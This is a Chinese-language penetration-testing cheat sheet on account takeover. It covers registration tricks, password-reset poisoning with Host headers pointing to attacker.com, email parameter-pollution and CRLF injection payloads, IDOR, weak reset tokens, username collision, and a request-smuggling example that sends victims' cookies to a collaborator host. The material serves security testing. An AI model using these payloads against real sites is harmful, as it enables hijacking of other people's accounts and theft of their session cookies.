Registration & Takeover Vulnerabilities

注册接管

重复注册

• 尝试使用现有用户名生成

• 检查不同的电子邮件：

• 大写字母

• +1@

• 在电子邮件中添加一些点

• 电子邮件名称中的特殊字符 (%00, %09, %20)

• 在电子邮件后放置黑色字符：test@test.com a

• victim@gmail.com@attacker.com

• victim@attacker.com@gmail.com

用户名枚举

检查您是否可以确定用户名是否已在应用程序中注册。

密码策略

创建用户时检查密码策略（检查您是否可以使用弱密码）。 在这种情况下，您可以尝试暴力破解凭据。

SQL 注入

查看此页面以了解如何通过注册表单中的 SQL 注入 尝试账户接管或提取信息。

Oauth 接管

SAML 漏洞

更改电子邮件

注册后尝试更改电子邮件，并检查此更改是否得到正确验证，或是否可以更改为任意电子邮件。

更多检查

• 检查您是否可以使用 一次性电子邮件

• 长 密码 (>200) 导致 DoS

• 检查账户创建的速率限制

• 使用 username@burp_collab.net 并分析 回调

密码重置接管

通过引荐人泄露密码重置令牌

1. 请求将密码重置到您的电子邮件地址

2. 点击密码重置链接

3. 不要更改密码

4. 点击任何第三方网站（例如：Facebook，Twitter）

5. 在 Burp Suite 代理中拦截请求

6. 检查 referer 头是否泄露密码重置令牌。

密码重置中毒

1. 在 Burp Suite 中拦截密码重置请求

2. 在 Burp Suite 中添加或编辑以下头部：Host: attacker.com，X-Forwarded-Host: attacker.com

3. 转发带有修改头部的请求 http POST https://example.com/reset.php HTTP/1.1 Accept: */* Content-Type: application/json Host: attacker.com

4. 查找基于 host 头 的密码重置 URL，例如：https://attacker.com/reset-password.php?token=TOKEN

通过电子邮件参数重置密码

# parameter pollution
email=victim@mail.com&email=hacker@mail.com

# array of emails
{"email":["victim@mail.com","hacker@mail.com"]}

# carbon copy
email=victim@mail.com%0A%0Dcc:hacker@mail.com
email=victim@mail.com%0A%0Dbcc:hacker@mail.com

# separator
email=victim@mail.com,hacker@mail.com
email=victim@mail.com%20hacker@mail.com
email=victim@mail.com|hacker@mail.com

IDOR on API Parameters

1. 攻击者必须使用他们的账户登录并进入更改密码功能。

2. 启动Burp Suite并拦截请求

3. 将其发送到重发器选项卡并编辑参数：用户ID/电子邮件 powershell POST /api/changepass [...] ("form": {"email":"victim@email.com","password":"securepwd"})

Weak Password Reset Token

密码重置令牌应该是随机生成的，并且每次都是唯一的。 尝试确定令牌是否过期或是否总是相同，在某些情况下，生成算法较弱，可以被猜测。以下变量可能被算法使用。

• 时间戳

• 用户ID

• 用户的电子邮件

• 名字和姓氏

• 出生日期

• 加密

• 仅数字

• 小令牌序列（字符在[A-Z,a-z,0-9]之间）

• 令牌重用

• 令牌过期日期

Leaking Password Reset Token

1. 使用API/UI触发特定电子邮件的密码重置请求，例如：test@mail.com

2. 检查服务器响应并查看resetToken

3. 然后在URL中使用令牌，如https://example.com/v3/user/password/reset?resetToken=[THE_RESET_TOKEN]&email=[THE_MAIL]

Password Reset Via Username Collision

1. 使用与受害者用户名相同的用户名在系统中注册，但在用户名前后插入空格。例如："admin "

2. 使用您的恶意用户名请求密码重置。

3. 使用发送到您电子邮件的令牌重置受害者密码。

4. 使用新密码连接到受害者账户。

平台CTFd对该攻击存在漏洞。 见：CVE-2020-7245

Account Takeover Via Cross Site Scripting

1. 在应用程序或子域中找到XSS，如果cookies的作用域为父域：*.domain.com

2. 泄露当前会话cookie

3. 使用cookie作为用户进行身份验证

Account Takeover Via HTTP Request Smuggling

1. 使用smuggler检测HTTP请求走私的类型（CL, TE, CL.TE） powershell git clone https://github.com/defparam/smuggler.git cd smuggler python3 smuggler.py -h 2. 构造一个请求，该请求将用以下数据覆盖POST / HTTP/1.1： GET http://something.burpcollaborator.net HTTP/1.1 X:，目的是将受害者重定向到burpcollab并窃取他们的cookies 3. 最终请求可能看起来像以下内容

GET / HTTP/1.1
Transfer-Encoding: chunked
Host: something.com
User-Agent: Smuggler/v1.0
Content-Length: 83
0

GET http://something.burpcollaborator.net  HTTP/1.1
X: X

Hackerone 报告利用此漏洞 * https://hackerone.com/reports/737140 * https://hackerone.com/reports/771666

通过 CSRF 实现账户接管

1. 创建 CSRF 的有效载荷，例如：“用于密码更改的自动提交 HTML 表单”

2. 发送有效载荷

通过 JWT 实现账户接管

JSON Web Token 可能用于验证用户。

• 使用另一个用户 ID / 电子邮件编辑 JWT

• 检查弱 JWT 签名

参考

• https://salmonsec.com/cheatsheet/account_takeover